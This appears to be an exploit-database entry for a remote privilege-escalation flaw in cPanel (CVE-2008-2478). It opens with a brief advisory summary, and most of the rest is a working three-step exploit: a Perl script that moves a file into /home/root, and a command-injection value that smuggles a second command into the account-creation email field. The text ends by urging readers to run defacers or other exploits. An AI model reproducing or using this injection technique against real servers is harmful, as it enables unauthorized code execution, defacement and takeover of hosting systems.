source: http://www.securityfocus.com/bid/29277/info cPanel is prone to a remote privilege-escalation vulnerability because of an unspecified error. Successfully exploiting this issue allows remote attackers to gain administrative privileges to the affected application and execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the webserver and the underlying system; other attacks are also possible. Test it: ++++++++++++++++++++++++++ Step 1 Save this file in /home/user/public_html/do.pl . #!/usr/bin/perl $old='/home/user/public_html/test.txt'; $new='/home/root/kon.txt'; rename $old, $new; ++++++++++++++++++++++++++ step 2 make a text file named test.txt in your public_html directory. path will be : /home/user/public_html/test.txt . ++++++++++++++++++++++++++ step 3 create an account and write email@example.com;./home/user/public_html/do.pl in E-mail Address text box then click on the "create" button. Yes , you can find your file in /home/root/ . ++++++++++++++++++++++++++ ()()()()()()()()()()()()() you can run your own code !(mass defacer, exploit's or everything that u want). Enjoy it...
Related ExploitsTrying to match CVEs (1): CVE-2008-2478
Trying to match OSVDBs (1): 45816
Other Possible E-DB Search Terms: cPanel 11.21, cPanel